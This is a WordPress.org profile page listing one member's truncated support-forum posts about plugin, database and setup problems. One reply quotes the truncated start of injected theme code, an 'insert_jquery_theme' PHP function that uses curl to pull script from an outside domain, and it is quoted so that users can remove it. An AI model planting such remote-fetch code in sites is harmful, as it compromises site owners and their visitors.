WordPress.org

Ready to get started?Download WordPress

Profiles

PeggyMe

Profile picture of PeggyMe
  • Member Since: December 16th, 2011
  • Posted a reply to "Participants database list not showing after wordpress update", on the site WordPress Support Forums:
    Your welcome! Thank You! As for me, I was using an old version of the…

    5 months ago

  • Posted a reply to "Participants database list not showing after wordpress update", on the site WordPress Support Forums:
    Your welcome. As for me,I was using a very old version of the Plug-in...I just…

    5 months ago

  • Posted a reply to "Participants database list not showing after wordpress update", on the site WordPress Support Forums:
    Wow did not expect you to answer so quickly. So I did some digging myself.…

    5 months ago

  • Posted a reply to "Participants database list not showing after wordpress update", on the site WordPress Support Forums:
    I am having the same problem. I am using PHP version 5.3.3. Just installed the…

    5 months ago

  • Created a topic, stop wp-admin from redirection to subfolder, on the site WordPress Support Forums

    1 year ago

  • Posted a reply to "image disapears after submiting", on the site WordPress Support Forums:
    the site is still in development,here is the url http://site.recordsearch.com.previewdns.com/contact/ ...thanks!

    2 years ago

  • Created a topic, image disapears after submiting, on the site WordPress Support Forums

    2 years ago

  • Posted a reply to "image disapears after submiting", on the site WordPress Support Forums:
    My bad I should have posted this on the Really Simple Captcha forum...so I guess…

    2 years ago

  • Created a topic, image disapears after submiting, on the site WordPress Support Forums

    2 years ago

  • Posted a reply to "install did not add tables to the database", on the site WordPress Support Forums:
    Thank You!! I have WordPress running now.

    2 years ago

  • Posted a reply to "install did not add tables to the database", on the site WordPress Support Forums:
    So here is a weird glitch. I received an email from the company that hosts…

    2 years ago

  • Posted a reply to "install did not add tables to the database", on the site WordPress Support Forums:
    I am using PHP Version 5.3.0 I am not sure how to check the version…

    2 years ago

  • Posted a reply to "install did not add tables to the database", on the site WordPress Support Forums:
    The database was empty,and it still is empty. I sent a email to the company…

    2 years ago

  • Posted a reply to "install did not add tables to the database", on the site WordPress Support Forums:
    OOPS ... I meant the upgrade Database button. No it is not my server.

    2 years ago

  • Created a topic, install did not add tables to the database, on the site WordPress Support Forums

    2 years ago

  • Posted a reply to "Put WordPress in root without index.php file", on the site WordPress Support Forums:
    OK Thank You for your time!!!

    2 years ago

  • Posted a reply to "Put WordPress in root without index.php file", on the site WordPress Support Forums:
    No I am not planning on replacing the old CMS later. I was pretty sure…

    2 years ago

  • Created a topic, Put WordPress in root without index.php file, on the site WordPress Support Forums

    2 years ago

  • Posted a reply to "Unwanted Jquery (jquerys) script", on the site WordPress Support Forums:
    I looked at the source code to your site. I do not see the unwanted…

    2 years ago

  • Posted a reply to "Unwanted Jquery (jquerys) script", on the site WordPress Support Forums:
    the code I had to remove was close to the code you found, but just…

    2 years ago

  • Posted a reply to "Unwanted Jquery (jquerys) script", on the site WordPress Support Forums:
    So the code that needs to be removed is: if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch…

    2 years ago

  • Posted a reply to "Unwanted Jquery (jquerys) script", on the site WordPress Support Forums:
    I have two site with the same problem. Taking that code out of the functions.php…

    2 years ago

  • Posted a reply to "Unwanted Jquery (jquerys) script", on the site WordPress Support Forums:
    I had the same problem...thank you for your help!!!

    2 years ago

  • Posted a reply to "jquerys.org in the header of my site", on the site WordPress Support Forums:
    My bad I dug a little farther and found that yesterday someone else solved the…

    2 years ago

  • Created a topic, jquerys.org in the header of my site, on the site WordPress Support Forums

    2 years ago

  • Posted a reply to "[Plugin: Participants Database] Form quit working after I put in 400 questions", on the site WordPress Support Forums:
    You Rock!!! It took me awhile to figure out the error log and all of…

    2 years ago

  • Posted a reply to "[Plugin: Participants Database] Form quit working after I put in 400 questions", on the site WordPress Support Forums:
    So glad to hear from you! I do not know the exact # where the…

    2 years ago

  • Posted a reply to "[Plugin: Participants Database] Form quit working after I put in 400 questions", on the site WordPress Support Forums:
    Thank You Wayne for your idea!! I had it set at 80 already. I did…

    2 years ago

  • Posted a reply to "[Plugin: Participants Database] Form quit working after I put in 400 questions", on the site WordPress Support Forums:
    So I am hoping that the Developer/Author of this plug-in will read this and be…

    2 years ago

  • Posted a reply to "[Plugin: Participants Database] Form quit working after I put in 400 questions", on the site WordPress Support Forums:
    ...fyi ... it started working again when I reduced the amount of questions to 200.…

    2 years ago

  • Created a topic, [Plugin: Participants Database] Form quit working after I put in 400 questions, on the site WordPress Support Forums

    2 years ago

  • Posted a reply to "[Plugin: Participants Database] paragraph tags in the PDb-record.css", on the site WordPress Support Forums:
    So I solved the problem. I took out the extra/blank lines in the css and…

    2 years ago

  • Created a topic, [Plugin: Participants Database] paragraph tags in the PDb-record.css, on the site WordPress Support Forums

    2 years ago

  • Created a topic, All in One SEO - title tags arn't working, on the site WordPress Support Forums

    3 years ago